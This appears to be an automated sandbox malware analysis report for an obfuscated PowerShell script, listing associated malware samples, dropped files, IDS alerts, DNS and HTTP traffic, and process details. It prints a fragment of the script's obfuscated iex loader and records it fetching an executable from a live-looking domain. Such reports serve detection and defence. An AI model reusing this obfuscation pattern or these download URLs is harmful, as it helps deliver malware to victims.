                                      http://www.thehorizondispatch.comGet hashmaliciousUnknownBrowse
                                      • 84.32.84.239
                                      DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                      • 84.32.84.32
                                      purchase order.exeGet hashmaliciousFormBookBrowse
                                      • 84.32.84.32
                                      SGGS-AS-APSGGSSGFjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                      • 203.175.174.69
                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                      • 203.175.174.69
                                      0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                      • 203.175.174.69
                                      teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                      • 103.14.247.60
                                      na.elfGet hashmaliciousGafgytBrowse
                                      • 103.14.247.29
                                      na.elfGet hashmaliciousGafgytBrowse
                                      • 103.14.247.60
                                      jZ6ejWIrSV.elfGet hashmaliciousGafgyt, MiraiBrowse
                                      • 103.14.247.64
                                      IGvLaRmr0J.elfGet hashmaliciousGafgyt, MiraiBrowse
                                      • 103.14.247.58
                                      wget.elfGet hashmaliciousGafgytBrowse
                                      • 103.14.247.62
                                      4v7myD9mN2OaWZp.exeGet hashmaliciousAgentTeslaBrowse
                                      • 203.175.171.5
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0eBJtvb5Vdhh.exeGet hashmaliciousQuasarBrowse
                                      • 84.32.84.229
                                      HquJT7q6xG.exeGet hashmaliciousQuasarBrowse
                                      • 84.32.84.229
                                      hKvlV6A1Rl.exeGet hashmaliciousQuasarBrowse
                                      • 84.32.84.229
                                      kqeGVKtpy2.exeGet hashmaliciousQuasarBrowse
                                      • 84.32.84.229
                                      LFLtlBAuf7.exeGet hashmaliciousQuasarBrowse
                                      • 84.32.84.229
                                      O9MV0lNEO5.exeGet hashmaliciousQuasarBrowse
                                      • 84.32.84.229
                                      RegAsm.exeGet hashmaliciousQuasarBrowse
                                      • 84.32.84.229
                                      truepepe-qt.exeGet hashmaliciousQuasarBrowse
                                      • 84.32.84.229
                                      FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                      • 84.32.84.229
                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                      • 84.32.84.229
                                      No context
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:NlllulxmH/lZ:NllUg
                                      MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                      SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                      SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                      SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:@...e................................. ..............@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6222
                                      Entropy (8bit):3.7189676517868038
                                      Encrypted:false
                                      SSDEEP:96:KNjFpCLP8EkvhkvCCtqpvwTFYraFHY8vwTFYraPHYY:KNjF+PjqpvwTFgZ8vwTFgHY
                                      MD5:0F870E8698CB722CEE10DEE080746C32
                                      SHA1:24B2EA400AC7AED9D12B81094BB1218CF74B23C9
                                      SHA-256:6D467AC12B60F589AA4D157FA5F615BD29B6B63D54F9628496CF7A527C3268BE
                                      SHA-512:AC6F856B26C5E9C237F2F9B5B06FC3EB4F6D48E02C76C6217627B3300F5FEACDA7848D5AC4297EFA17470543E27DEA68C970A4EF80A80DB0BD2A73583E0D9C8F
                                      Malicious:false
                                      Preview:...................................FL..................F.".. ......Yd......`.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd.../.<\.R....`.R......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y.\..........................d...A.p.p.D.a.t.a...B.V.1......Y.\..Roaming.@......EW)B.Y.\..........................t..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.Y.\............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.Y.\...........................`..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.Y.\....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.Y.\....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.Y.\.....0..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6222
                                      Entropy (8bit):3.7189676517868038
                                      Encrypted:false
                                      SSDEEP:96:KNjFpCLP8EkvhkvCCtqpvwTFYraFHY8vwTFYraPHYY:KNjF+PjqpvwTFgZ8vwTFgHY
                                      MD5:0F870E8698CB722CEE10DEE080746C32
                                      SHA1:24B2EA400AC7AED9D12B81094BB1218CF74B23C9
                                      SHA-256:6D467AC12B60F589AA4D157FA5F615BD29B6B63D54F9628496CF7A527C3268BE
                                      SHA-512:AC6F856B26C5E9C237F2F9B5B06FC3EB4F6D48E02C76C6217627B3300F5FEACDA7848D5AC4297EFA17470543E27DEA68C970A4EF80A80DB0BD2A73583E0D9C8F
                                      Malicious:false
                                      Preview:...................................FL..................F.".. ......Yd......`.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd.../.<\.R....`.R......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y.\..........................d...A.p.p.D.a.t.a...B.V.1......Y.\..Roaming.@......EW)B.Y.\..........................t..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.Y.\............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.Y.\...........................`..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.Y.\....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.Y.\....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.Y.\.....0..........
                                      File type:ASCII text, with very long lines (828), with no line terminators
                                      Entropy (8bit):5.36588945110659
                                      TrID:
                                        File name:ER4HMMzeQ3.ps1
                                        File size:828 bytes
                                        MD5:6f6360404593e3dfcddbe109dc6bbc4e
                                        SHA1:62b5dc699e54dd5f3bd387771428063123d10d90
                                        SHA256:e7e0f0c28c75837367088d127100c545ca92a40f20b17fb5eb3205f3583a9c09
                                        SHA512:03c5cf868fca0f3cc6054e6158b68f43911c1151e6f2e9aef992ce5b19cf8cdd8d80266af7062744ab082e9c2fb4baf350693c6a5fc442c39965eb4950fc4c02
                                        SSDEEP:24:n9m8gWI4YUCxLogLeIuvod4WAa6W9zmNNP:9vIE+Sod2qziNP
                                        TLSH:9B01F189669292E30655F8D230C59A3E323AD61EA6D108A1F5F5030325FC63D1DC2D79
                                        File Content Preview:$flol3=iex($('[Environment]::GetExdjt'''.Replace('xdj','nvironmentVariable(''public'') + ''\\ph026g.ba')));$flol=iex($('[Environment]::GetExdjt'''.Replace('xdj','nvironmentVariable(''public'') + ''\\fx2z.ba')));function getit([string]$fz, [string]$oulv){$
                                        Icon Hash:3270d6baae77db44
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-12-19T12:37:33.203420+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.84970584.32.84.229443TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 19, 2024 12:37:31.085439920 CET49705443192.168.2.884.32.84.229
                                        Dec 19, 2024 12:37:31.085505009 CET4434970584.32.84.229192.168.2.8
                                        Dec 19, 2024 12:37:31.085602999 CET49705443192.168.2.884.32.84.229
                                        Dec 19, 2024 12:37:31.096590996 CET49705443192.168.2.884.32.84.229
                                        Dec 19, 2024 12:37:31.096657991 CET4434970584.32.84.229192.168.2.8
                                        Dec 19, 2024 12:37:32.337004900 CET4434970584.32.84.229192.168.2.8
                                        Dec 19, 2024 12:37:32.337236881 CET49705443192.168.2.884.32.84.229
                                        Dec 19, 2024 12:37:32.340678930 CET49705443192.168.2.884.32.84.229
                                        Dec 19, 2024 12:37:32.340708017 CET4434970584.32.84.229192.168.2.8
                                        Dec 19, 2024 12:37:32.341037035 CET4434970584.32.84.229192.168.2.8
                                        Dec 19, 2024 12:37:32.352773905 CET49705443192.168.2.884.32.84.229
                                        Dec 19, 2024 12:37:32.399382114 CET4434970584.32.84.229192.168.2.8
                                        Dec 19, 2024 12:37:33.203454018 CET4434970584.32.84.229192.168.2.8
                                        Dec 19, 2024 12:37:33.203525066 CET4434970584.32.84.229192.168.2.8
                                        Dec 19, 2024 12:37:33.203588009 CET49705443192.168.2.884.32.84.229
                                        Dec 19, 2024 12:37:33.206542015 CET49705443192.168.2.884.32.84.229
                                        Dec 19, 2024 12:37:34.125225067 CET4970680192.168.2.8203.175.174.69
                                        Dec 19, 2024 12:37:34.244721889 CET8049706203.175.174.69192.168.2.8
                                        Dec 19, 2024 12:37:34.244987011 CET4970680192.168.2.8203.175.174.69
                                        Dec 19, 2024 12:37:34.295634985 CET4970680192.168.2.8203.175.174.69
                                        Dec 19, 2024 12:37:34.415334940 CET8049706203.175.174.69192.168.2.8
                                        Dec 19, 2024 12:37:35.812588930 CET8049706203.175.174.69192.168.2.8
                                        Dec 19, 2024 12:37:35.855350018 CET4970680192.168.2.8203.175.174.69
                                        Dec 19, 2024 12:37:35.871109009 CET4970680192.168.2.8203.175.174.69
                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 19, 2024 12:37:30.126244068 CET5355153192.168.2.81.1.1.1
                                        Dec 19, 2024 12:37:31.078088999 CET53535511.1.1.1192.168.2.8
                                        Dec 19, 2024 12:37:33.208314896 CET6336153192.168.2.81.1.1.1
                                        Dec 19, 2024 12:37:33.450021982 CET53633611.1.1.1192.168.2.8
                                        Dec 19, 2024 12:37:33.805552959 CET5856553192.168.2.81.1.1.1
                                        Dec 19, 2024 12:37:34.122611046 CET53585651.1.1.1192.168.2.8
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Dec 19, 2024 12:37:30.126244068 CET192.168.2.81.1.1.10xac95Standard query (0)www.yashenviro.comA (IP address)IN (0x0001)false
                                        Dec 19, 2024 12:37:33.208314896 CET192.168.2.81.1.1.10xdcfeStandard query (0)yashenviro.comA (IP address)IN (0x0001)false
                                        Dec 19, 2024 12:37:33.805552959 CET192.168.2.81.1.1.10x8b27Standard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Dec 19, 2024 12:37:31.078088999 CET1.1.1.1192.168.2.80xac95No error (0)www.yashenviro.comwww.yashenviro.com.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                                        Dec 19, 2024 12:37:31.078088999 CET1.1.1.1192.168.2.80xac95No error (0)www.yashenviro.com.cdn.hstgr.net84.32.84.229A (IP address)IN (0x0001)false
                                        Dec 19, 2024 12:37:33.450021982 CET1.1.1.1192.168.2.80xdcfeNo error (0)yashenviro.com77.37.83.9A (IP address)IN (0x0001)false
                                        Dec 19, 2024 12:37:34.122611046 CET1.1.1.1192.168.2.80x8b27No error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false
                                        • www.yashenviro.com
                                        • www.bluemaxxlaser.com
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.849706203.175.174.69805012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 19, 2024 12:37:34.295634985 CET123OUTGET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                        Host: www.bluemaxxlaser.com
                                        Connection: Keep-Alive
                                        Dec 19, 2024 12:37:35.812588930 CET516INHTTP/1.1 404 Not Found
                                        Date: Thu, 19 Dec 2024 11:37:35 GMT
                                        Server: Apache
                                        Content-Length: 315
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.84970584.32.84.2294435012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-19 11:37:32 UTC77OUTGET /rh/rb.exe HTTP/1.1
                                        Host: www.yashenviro.com
                                        Connection: Keep-Alive
                                        2024-12-19 11:37:33 UTC608INHTTP/1.1 301 Moved Permanently
                                        Date: Thu, 19 Dec 2024 11:37:33 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: close
                                        x-powered-by: PHP/7.4.33
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        cache-control: no-cache, must-revalidate, max-age=0
                                        x-redirect-by: Rank Math
                                        location: https://yashenviro.com
                                        platform: hostinger
                                        panel: hpanel
                                        content-security-policy: upgrade-insecure-requests
                                        x-turbo-charged-by: LiteSpeed
                                        Server: hcdn
                                        alt-svc: h3=":443"; ma=86400
                                        x-hcdn-request-id: af63c6464af34b5eb5d755a8c5731426-bos-edge4
                                        x-hcdn-cache-status: MISS
                                        x-hcdn-upstream-rt: 0.353


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:06:37:26
                                        Start date:19/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ER4HMMzeQ3.ps1"
                                        Imagebase:0x7ff6cb6b0000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:1
                                        Start time:06:37:26
                                        Start date:19/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Reset < >
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1598802392.00007FFB4B0B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffb4b0b0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2350e85319fb4e86c41473e02bcf4dc94e3dc58c0d355df734de2a65c37ac21f
                                          • Instruction ID: 3724b73a718cc871554b8fbf43bebc5a93daf6a5a2c0d35a26fdd8ac24e2a91a
                                          • Opcode Fuzzy Hash: 2350e85319fb4e86c41473e02bcf4dc94e3dc58c0d355df734de2a65c37ac21f
                                          • Instruction Fuzzy Hash: 35D17CA292DB864FF399AABCC8551747BD2EF45211B0841FED18DC72E7ED18AC168342
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1598802392.00007FFB4B0B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffb4b0b0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c61ea195ee6ffcacf7d39e77a2e94a569df0a1e63cada5c4883b6cd15fd3881d
                                          • Instruction ID: 05c35e0d3d094c1df664c1b7110380dc20b3b1d4c09902efc74307acf906bd01
                                          • Opcode Fuzzy Hash: c61ea195ee6ffcacf7d39e77a2e94a569df0a1e63cada5c4883b6cd15fd3881d
                                          • Instruction Fuzzy Hash: A7D157A291EB8A4FE7A6FBB8C8155B97FE2EF12311B1800FED54DC71A3D91898058351
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1598802392.00007FFB4B0B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffb4b0b0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed849450aa856754838b6832b9754a13085b2b9688907b2ef1cbb39a056fe949
                                          • Instruction ID: 1d99c666194af968f86981fc7ead581471aa747d165101b598431231f75f78e5
                                          • Opcode Fuzzy Hash: ed849450aa856754838b6832b9754a13085b2b9688907b2ef1cbb39a056fe949
                                          • Instruction Fuzzy Hash: BD214BB2E2EA864FF3ADBAB8C95517466C3EF44212B5840F9E14CC72E7EE18EC154241
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1598802392.00007FFB4B0B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffb4b0b0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d0b5d8ba5f28d80c51ff6bf34c28097e549a7342f39ad2e7c9ff72970b025ae0
                                          • Instruction ID: ab5d7d0179ca4cba2caf34eea29bed165e0cf5572062b5c13971cd4341aca024
                                          • Opcode Fuzzy Hash: d0b5d8ba5f28d80c51ff6bf34c28097e549a7342f39ad2e7c9ff72970b025ae0
                                          • Instruction Fuzzy Hash: DF1101A2A1D6490FEBA5EEACD55017CB7D2EF58312F1840BEC24DC72A3DD35A8058350
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1598264770.00007FFB4AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffb4afe0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                          • Instruction ID: e9c557f50eef70d2117fa1b0a7c8386b185c85590f7b57b62e68d277122e6959
                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                          • Instruction Fuzzy Hash: 8301677111CB0D8FD744EF0CE455AA6B7E0FB99364F10056DE58AC3691DA36E882CB46